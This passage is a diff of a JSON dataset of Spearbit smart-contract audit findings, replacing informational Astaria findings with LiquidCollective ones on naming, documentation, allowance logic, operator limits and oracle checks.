_pushToRiver calls _sanityChecks to perform some checks, such as not allowing changes in the amount of staked ether that are below or above some bounds. The call that would be made is _sanityChecks(oracleReportedStakedBalance, prevTotalEth, timeElapsed), where timeElapsed is calculated as uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot; So, timeElapsed is the number of seconds between the reported epoch and the LastEpochId. But in this scenario, LastEpochId has the old value from the previous call to _pushToRiver made 30 days ago, which will be epochId_X.
Because of this, the check made inside _sanityChecks for the upper bound would be more relaxed, allowing a wider spread between oracleReportedStakedBalance and prevTotalEth.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "safeTransferFrom() without the data argument can be used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code above sends empty data over an external call via ERC721.safeTransferFrom(from, to, tokenId, data): IERC721(underlyingAsset).safeTransferFrom( address(this), releaseTo, assetId, \"\" ); data can be removed since ERC721.safeTransferFrom(from, to, tokenId) sets empty data too.", + "title": "Consider renaming OperatorResolution.active to a more meaningful name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The name active in the struct OperatorResolution could be misleading because it can be confused with the fact that an operator (the struct containing the real operator information is Operator) is active or not. The value of OperatorResolution.active does not represent whether an operator is active; it is used to know whether the index associated with the struct's item (OperatorResolution.index) is used or not.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Fix documentation that updateVaultAfterLiquidation can be called by LIEN_TOKEN, not ROUTER", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The function has the correct validation that it can only be called by LIEN_TOKEN(), but the comment says it can only be called by ROUTER(). require(msg.sender == address(LIEN_TOKEN())); // can only be called by router", + "title": "lsETH and WlsETH's name() functions return inconsistent names.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "lsETH.name() is River Ether, while WlsETH.name() is Wrapped Alluvial Ether.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Declare event and constants at the beginning", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Events and constants are generally declared at the beginning of a smart contract. However, for the highlighted code above, that's not the case.", + "title": "Rename modifiers to have consistent naming and patterns only.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The modifiers ifGovernor and ifGovernorOrExecutor in Firewall.sol have different naming conventions and also different logical patterns.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Rename Vault to PrivateVault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Vault contract is used to represent private vaults.", + "title": "OperatorResolution.active might be a redundant struct field which can be removed.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The value of active stays true once it has been set true for a given index.
This is especially true since the only call to Operators.set is from OperatorsRegistryV1.addOperator, which does not override values for already registered names.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Remove comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Comment at line WithdrawProxy.sol#L229 can be removed: if ( block.timestamp < s.finalAuctionEnd // || s.finalAuctionEnd == uint256(0) ) { The condition in comments is always false as the code already reverts in that case.", + "title": "The expression for selectedOperatorAvailableKeys in OperatorsRegistry can be simplified.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "operators[selectedOperatorIndex].limit is always less than or equal to operators[selectedOperatorIndex].keys, since the places where the limit is set to a value other than 0 have checks against going above the keys bound: OperatorsRegistry.1.sol#L250-L252 if (_newLimits[idx] > operator.keys) { revert OperatorLimitTooHigh(_newLimits[idx], operator.keys); } OperatorsRegistry.1.sol#L324-L326 if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } OperatorsRegistry.1.sol#L344-L346 if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; }", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "WithdrawProxy and PrivateVault symbols are missing hyphens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The symbol for the WithdrawProxy token is missing a hyphen after the W, which will make the name AST-W0x... instead of AST-W-0x....
Similarly, the symbol for the Private Vault token (in Vault.sol) is missing a hyphen after the V.", - "labels": [ + "title": "The unused constant DELTA_BASE can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The constant DELTA_BASE in BeaconReportBounds is never used.", + "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Lien cannot be bought out after stack.point.end", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The _getRemainingInterest function reverts with Panic(0x11) when block.timestamp > stack.point.end.", + "title": "Remove unused modifiers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The modifier active(uint256 _index) is not used in the project.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Inconsistent strictness of inequalities in isValidRefinance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In isValidRefinance, we check that either: a) newRate < maxNewRate && newEnd >= oldEnd b) newEnd - oldEnd >= minDurationIncrease && newRate <= oldRate We should be consistent in whether we're enforcing the changes are strict inequalities or non-strict inequalities.", + "title": "Modifier names do not follow the same naming patterns", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The modifier names do not follow the same naming patterns in OperatorsRegistry.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Clarify comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Few comments are not clear on what they are referring to: zone: address(this), // 0x20 ... conduitKey: s.CONDUIT_KEY, // 0x120", + "title": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent the values it holds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent the values it holds. _statuses is a bitmap where each bit represents a particular action that a user can take.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Remove unused files", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "CallUtils.sol is not used anywhere in the codebase.", + "title": "riverAddress can be renamed to river and we can avoid extra interface casting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "riverAddress's name suggests that it is only an address, although it is an address with the IRiverV1 interface attached to it. Also, we can avoid unnecessary casting of interfaces, as sketched below.
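A sketch of that rename (the IRiverV1 name comes from the report; the field shape is an assumption):

pragma solidity ^0.8.10;

interface IRiverV1 {
    function totalUnderlyingSupply() external view returns (uint256);
}

contract OracleSketch {
    // Typed field: the cast happens once, at construction time.
    IRiverV1 internal immutable river;

    constructor(address riverAddress) {
        river = IRiverV1(riverAddress);
    }

    function _prevTotalEth() internal view returns (uint256) {
        return river.totalUnderlyingSupply(); // no per-call interface casting
    }
}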
", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document privileges and entities holding these privileges", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are certain privileged functionalities in the codebase (recognized through requiresAuth mod- ifier). Currently, we have to refer to tests to identify the setup.", + "title": "Define named constants for numeric literals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In _sanityChecks there are 2 numeric literals, 10000 and 365 days, used: uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) ... if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) {", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document and ensure that maximum number of liens should not be set greater than 256", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Maximum number of liens in a stack is currently set to 5. While paying for a lien, the index in the stack is casted to uint8. This makes the implicit limit on maximum number of liens to be 256.", + "title": "Move memberIndex and ReportsPositions checks to the beginning of the OracleV1.reportBeacon function.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The checks for memberIndex == -1 and ReportsPositions.get(uint256(memberIndex)) happen in the middle of reportBeacon after quite a few calculations are done.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "transferWithdrawReserve() can return early when the current epoch is 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If s.currentEpoch == 0, s.currentEpoch - 1 will wrap around to type(uint256).max and we will most probably will drain assets into address(0) in the following block: unchecked { s.withdrawReserve -= WithdrawProxy(withdrawProxy) .drain( s.withdrawReserve, s.epochData[s.currentEpoch - 1].withdrawProxy ) .safeCastTo88(); } But this cannot happen since in the outer if block the condition s.withdrawReserve > 0 indirectly means that s.currentEpoch > 0. The indirect implication above regarding the 2 conditions stems from the fact that s.withdrawReserve has only been set in transferWithdrawReserve() function or processEpoch(). In transferWithdrawReserve() function 78 it assumes a positive value only when s.currentEpoch > uint64(0) and in processEpoch() at the end we are incrementing s.currentEpoch.", + "title": "Document what incentivizes the operators to run their validators when globalFee is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If GlobalFee could be 0, then neither the treasury nor the operators earn rewards.
What factor would motivate the operators to keep their validators running?", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "2 of the inner if blocks of processEpoch() check for a condition that has already been checked by an outer if block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following 2 if block checks are redundant: if (address(currentWithdrawProxy) != address(0)) { currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); } uint256 expected = 0; if (address(currentWithdrawProxy) != address(0)) { expected = currentWithdrawProxy.getExpected(); } Since the condition address(currentWithdrawProxy) != address(0) has already been checked by an outer if block.", + "title": "Document how Alluvial plans to prevent institutional investors and operators from getting into business directly and bypassing the River protocol.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Since the list of operators and also depositors can be looked up from the information on-chain, what would prevent institutional investors (users) and the operators from doing business outside of River? Is there going to be an off-chain legal contract between Alluvial and these other entities to prevent this scenario?", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "General formatting suggestions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": " PublicVault.sol#L283 : there are extra sourounding paranthesis", + "title": "Document how operator rewards will be distributed if OperatorRewardsShare is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If OperatorRewardsShare could be 0, then the operators won't earn rewards. What factor would motivate the operators to keep their validators running? Sidenote: other incentives for the operators to keep their validators running (if their reward share portion is 0) would be some sort of MEV or block proposal/attestation bribes. Related: Avoid to waste gas distributing rewards when the number of shares to be distributed is zero", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Identical collateral check is performed twice in _createLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _createLien, a check is performed that the collateralId of the new lien matches the collateralId of the first lien on the stack. if (params.stack.length > 0) { if (params.lien.collateralId != params.stack[0].lien.collateralId) { revert InvalidState(InvalidStates.COLLATERAL_MISMATCH); } } This identical check is performed twice (L383-387 and L389-393).", + "title": "Current operator reward distribution does not favor more performant operators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Reward shares are distributed based on the fraction of the active funded non-stopped validators owned by an operator. This distribution of shares does not promote the honest operation of validators to the fullest extent.
Since the oracle members don't report the delta in the balance of each validator, it is not possible to reward operators/validators that have been performing better than the rest. Also, if a high-performing operator or operators were the main source of the beacon balance sum, and if they had enough ETH to initially deposit into the ETH2.0 deposit contract on their own, they could have made more profit that way versus joining as an operator in the River protocol.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "checkAllowlistAndDepositCap modifier can be defined to consolidate some of the mint and deposit logic for public vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following code snippet has been used for both mint and deposit endpoints of a public vault: VIData storage s = _loadVISlot(); if (s.allowListEnabled) { require(s.allowList[receiver]); } uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); }", + "title": "TRANSFER_MASK == 0 which causes a no-op.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "TRANSFER_MASK is a named constant defined as 0 (River.1.sol#L37). Like the other masks DEPOSIT_MASK and DENY_MASK, which are supposed to represent bitmasks, at first glance you would think TRANSFER_MASK would also need to represent a bitmask. But if you take a look at _onTransfer: function _onTransfer(address _from, address _to) internal view override { IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_from, TRANSFER_MASK); // this call reverts if unauthorized or denied IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_to, TRANSFER_MASK); // this call reverts if unauthorized or denied } This translates into calling onlyAllowed with: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(x, 0); Now if we look at the onlyAllowed function with these parameters: function onlyAllowed(x, 0) external view { uint256 userPermissions = Allowlist.get(x); if (userPermissions & DENY_MASK == DENY_MASK) { revert Denied(_account); } if (userPermissions & 0 != 0) { // <--- ( x & 0 != 0 ) == false revert Unauthorized(_account); } } Thus if the _from and _to addresses don't have their DENY_MASK set to 1, they would not trigger a revert, since we would never step into the 2nd if block above when TRANSFER_MASK is passed to these functions. TRANSFER_MASK is also used in _onDeposit: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_depositor, DEPOSIT_MASK + TRANSFER_MASK); // DEPOSIT_MASK + TRANSFER_MASK == DEPOSIT_MASK IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_recipient, TRANSFER_MASK); // like above in _onTransfer
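One possible direction is to give TRANSFER_MASK a dedicated bit so that the second if block in onlyAllowed can actually trigger. The following is a sketch only (the concrete bit values, and whether transfers should require a permission at all, are design decisions for Alluvial; the constants here are illustrative, not the project's fix):

uint256 internal constant DEPOSIT_MASK = 0x1;       // existing bit (illustrative value)
uint256 internal constant TRANSFER_MASK = 0x1 << 1; // dedicated bit instead of 0

function _onTransfer(address _from, address _to) internal view override {
    // with a non-zero mask, onlyAllowed now reverts unless the permission bit is set
    IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_from, TRANSFER_MASK);
    IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_to, TRANSFER_MASK);
}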
`_onTransfer`", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document why bytes4(0xffffffff) is chosen when CollateralToken acting as a Seaport zone to signal invalid orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "bytes4(0xffffffff) to indicate a Seaport order using this zone is not a valid order.", + "title": "Reformat numeric literals with many digits for better readability.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Reformat numeric literals with many digits into a more readable form.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "CollateralToken.onERC721Received's use of depositFor stack variable is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If we follow the logic of assigning values to depositFor in CollateralToken.onERC721Received, we notice that it will end up being from_. So its usage is redundant.", + "title": "Firewall should follow the two-step approach present in River when transferring govern address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Both River and OperatorsRegistry follow a two-step approach to transfer the ownership of the contract. 1) Propose a new owner storing the address in a pendingAdmin variable 2) The pending admins accept the new role by actively calling acceptOwnership This approach makes this crucial action much safer because 1) Prevent the admin to transfer ownership to address(0) given that address(0) cannot call acceptOwnership 2) Prevent the admin to transfer ownership to an address that cannot \"admin\" the contract if they cannot call acceptOwnership. For example, a contract do not have the implementation to at least call acceptOwnership. 3) Allow the current admin to stop the process by calling transferOwnership(address(0)) if the pending admin has not called acceptOwnership yet The current implementation does not follow this safe approach, allowing the governor to directly transfer the gov- ernor role to a new address.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "onlyOwner modifier can be defined to simplify the codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "releaseToAddress checks whether the msg.sender is an owner of a collateral. CollateralToken already has a modifier onlyOwner(...), so the initial check in releaseToAddress can be delegated to the modifier.", + "title": "OperatorRegistry.removeValidators is resetting the limit (approved validators) even when not needed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of removeValidators allow an admin or node operator to remove val- idators, passing to the function the list of validator's index to be removed. Note that the list of indexes must be ordered DESC. 
At the end of the function, we can see these checks: if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; } This resets the operator's limit to the lowest removed index (to prevent a non-approved key from getting swapped to a position inside the limit). The issue with this implementation is that it does not consider the case where all the operator's validators have already been approved by Alluvial. In this case, if an operator removes the validator with the lowest index, all the other validators get de-approved, because the limit will be set to that lowest index. Consider this scenario: op.limit = 10 op.keys = 10 op.funded = 0 This means that all the validators added by the operator have been approved by Alluvial and are safe (keys == limit). If the operator or Alluvial calls removeValidators removing the validator at index 0, this will swap validator_10 with validator_0 and set the limit to 0, because 0 < 10 (_indexes[_indexes.length - 1] < operator.limit). The consequence is that even if all the validators present before calling removeValidators were \"safe\" (because approved by Alluvial), the limit is now 0, meaning that all the validators are not \"safe\" anymore and cannot be selected by pickNextValidators.
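A sketch of a guard that skips the reset when no unapproved key can end up inside the limit (keysBeforeRemoval is a hypothetical local holding the operator's key count before the removals; the exact bookkeeping has to be adapted to OperatorsRegistry.1.sol):

uint256 lastIndex = _indexes[_indexes.length - 1];
// only de-approve when keys beyond the approved limit exist, i.e. when an
// unapproved key could have been swapped into a position below the limit
if (lastIndex < operator.limit && keysBeforeRemoval > operator.limit) {
    operator.limit = lastIndex;
}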
", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document liquidator's role for the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a lien's term ends (stack.point.end <= block.timestamp), anyone can call liquidate on AstariaRouter. There is no restriction on the msg.sender. The msg.sender will be set as the liquidator, and: if the Seaport auction ends (3 days currently, set by the protocol), they can call liquidatorNFTClaim to claim the NFT; or if the Seaport auction settles, the liquidator receives the liquidation fee.", + "title": "Consider renaming transferOwnership to better reflect the function's logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of transferOwnership is not really transferring the ownership from the current admin to the new one. The function is setting the value of the pending admin, who must subsequently call acceptOwnership to accept the role and confirm the transfer of the ownership.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Until ASTARIA_ROUTER gets filed for CollateralToken, CollateralToken cannot receive ERC721s safely.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "ASTARIA_ROUTER is not set in the CollateralToken's constructor. So until an entity with authority files for it, CollateralToken is unable to safely receive an ERC721 token (whenNotPaused and onERC721Received would revert).", + "title": "Wrong return name used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The min function returns the minimum of the 2 inputs, but the return name used is max.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "_getMaxPotentialDebtForCollateral might have been meant to be an internal function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_getMaxPotentialDebtForCollateral is defined as a public function, yet its name starts with an underscore, which by convention is usually used for internal or private functions.", + "title": "Discrepancy between architecture and code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The architecture diagram states that the admin triggers deposits on the Consensus Layer Deposit Manager, but the depositToConsensusLayer() function allows anyone to trigger such deposits.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "return keyword can be removed from stopLiens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_stopLiens does not return any values, but in stopLiens the return statement is used along with the non-existent return value of _stopLiens.", + "title": "Consider replacing the remaining require with custom errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The vast majority of the contracts in the project define and already use custom errors, which provide better UX, DX and gas savings compared to require statements. There are still some instances of require usage in the ConsensusLayerDepositManager and BytesLib contracts that could be replaced with custom errors.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "LienToken's constructor does not set ASTARIA_ROUTER which makes some of the endpoints non-functional", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "LienToken's constructor does not set ASTARIA_ROUTER. That means until an authorized entity calls file to set this parameter, the following functions would be broken/revert: buyoutLien _buyoutLien _payDebt getBuyout _getBuyout _isPublicVault setPayee (partially broken) _paymentAH payDebtViaClearingHouse", + "title": "Both wlsETH and lsETH transferFrom implementation allow the owner of the token to use transferFrom as if it were a \"normal\" transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of transferFrom allows the msg.sender to use the function as if it were a \"normal\" transfer.
In this case, the allowance is checked only if the msg.sender is not equal to _from: if (_from != msg.sender) { uint256 currentAllowance = ApprovalsPerOwner.get(_from, msg.sender); if (currentAllowance < _value) { revert AllowanceTooLow(_from, msg.sender, currentAllowance, _value); } ApprovalsPerOwner.set(_from, msg.sender, currentAllowance - _value); } This implementation diverges from what is usually implemented in both Solmate and OpenZeppelin.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document the approval process for a user's CollateralToken before calling commitToLiens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the _executeCommitment's return statement: IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( c, address(this) ); address(this) is the AstariaRouter. The call here to commitToLien enters into _validateCommitment with AstariaRouter as the receiver, and so for it to not revert, the holder would need to have set the approval for the router beforehand: CT.isApprovedForAll(holder, receiver) // needs to be true", + "title": "Both wlsETH and lsETH tokens are reducing the allowance when the allowed amount is type(uint256).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of the function transferFrom in both SharesManager.1.sol and WLSETH.1.sol is not taking into consideration the scenario where a user has approved a spender the maximum possible allowance, type(uint256).max. The Alluvial transferFrom acts differently from standard ERC20 implementations like the ones from Solmate and OpenZeppelin. In their implementations, they check and reduce the spender allowance if and only if the allowance is different from type(uint256).max.
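Following that convention, and reusing the storage helpers and the custom error from the snippet above, the allowance branch could look as follows (a sketch; only the infinite-allowance short-circuit is new):

if (_from != msg.sender) {
    uint256 currentAllowance = ApprovalsPerOwner.get(_from, msg.sender);
    // treat type(uint256).max as an infinite allowance and never decrease it
    if (currentAllowance != type(uint256).max) {
        if (currentAllowance < _value) {
            revert AllowanceTooLow(_from, msg.sender, currentAllowance, _value);
        }
        ApprovalsPerOwner.set(_from, msg.sender, currentAllowance - _value);
    }
}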
", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "isValidRefinance's return statement can be reformatted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Currently, it is a bit hard to read the return statement of isValidRefinance.", + "title": "Missing, confusing or wrong natspec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In the current implementation not all the constructors, functions, events, custom errors, variables or structs are covered by natspec comments. Some of them are only partially covered (missing @param, @return and so on). Note that the contracts listed in the context section of the issue have complete or partially missing natspec. Natspec fixes / typos: River.1.sol#L38-L39 Swap the empty line with the NatSpec @notice: - /// @notice Prevents unauthorized calls - + + /// @notice Prevents unauthorized calls OperatorsRegistry.1.sol#L44, OperatorsRegistry.1.sol#L61, OperatorsRegistry.1.sol#L114 Replace name with index: - /// @param _index The name identifying the operator + /// @param _index The index identifying the operator OperatorsRegistry.1.sol#L218 Replace cound with count: - /// @notice Changes the operator stopped validator cound + /// @notice Changes the operator stopped validator count Expand the natspec explanations: we also suggest expanding on some functions' logic inside the natspec. OperatorsRegistry.1.sol#L355-L358 Expand the natspec documentation and add a @return natspec comment clarifying that the returned value is the number of total operators and not the active/fundable ones. ReportsVariants.sol#L5 Add a comment that explains COUNT_OUTMASK's assignment: it masks out beaconValidators and beaconBalance in the designed packing, so that xx...xx xxxx & COUNT_OUTMASK == 00...00 0000. ReportsVariants.sol ReportsVariants should have documentation regarding the packing of a report variant in a uint256: [0, 16): oracle member's total vote count for the numbers below (uint16, 2 bytes); [16, 48): total number of beacon validators (uint32, 4 bytes); [48, 112): total balance of all the beacon validators (uint64, 6 bytes). OracleMembers.sol Leave a comment/warning that there can only be a maximum of 256 oracle members. This is due to the ReportsPositions setup, where in a uint256, 1 bit is reserved for each oracle member's index. ReportsPositions.sol Leave a comment/warning for the ReportsPositions setup that the ith bit in the uint256 represents whether or not there has been a beacon report by the ith oracle member. Oracle.1.sol#L202-L205 Leave a comment/warning that there can only be a maximum of 256 oracle members. This is due to the ReportsPositions setup, where in a uint256, 1 bit is reserved for each oracle member's index. Allowlist.1.sol#L46-L49 Leave a comment warning that the permission bitmaps will be overwritten instead of getting updated. OracleManager.1.sol#L44 Add more comments for _roundId to mention that setBeaconData is called by Oracle.1.sol:_pushToRiver and that the value passed to it for this parameter is always the 1st epoch of a frame. OperatorsRegistry.1.sol#L304-L310 Document the _indexes parameter, mentioning that this array: 1) needs to be duplicate-free and sorted (DESC); 2) each element in the array needs to be in a specific range, namely operator.[funded, keys). OperatorsRegistry.1.sol#L60-L62 Better rephrase the natspec comment to avoid further confusion. Oracle.1.sol#L284-L289 Update the reportBeacon natspec documentation about the _beaconValidators parameter to avoid further confusion. Client answer to the PR comment: The docs should be updated to also reflect our plans for the Shanghai fork. Basically we can't just have the same behavior for a negative delta in validator count as with a positive delta (where we just assume that each validator that was in the queue only had 32 eth). Now when we exit validators we need to know how much was exited in order to compute the proper revenue value for the treasury and operator fee. This probably means that there will be an extra arg with the oracle to keep track of the exited eth value. But as long as the spec is not final, we'll stick to the validator count always growing. We should definitely add a custom error to explain that in case a report provides a smaller validator count.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Withdraw Reserves should always be transferred before Commit to Lien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a new lien is requested, the _beforeCommitToLien() function is called.
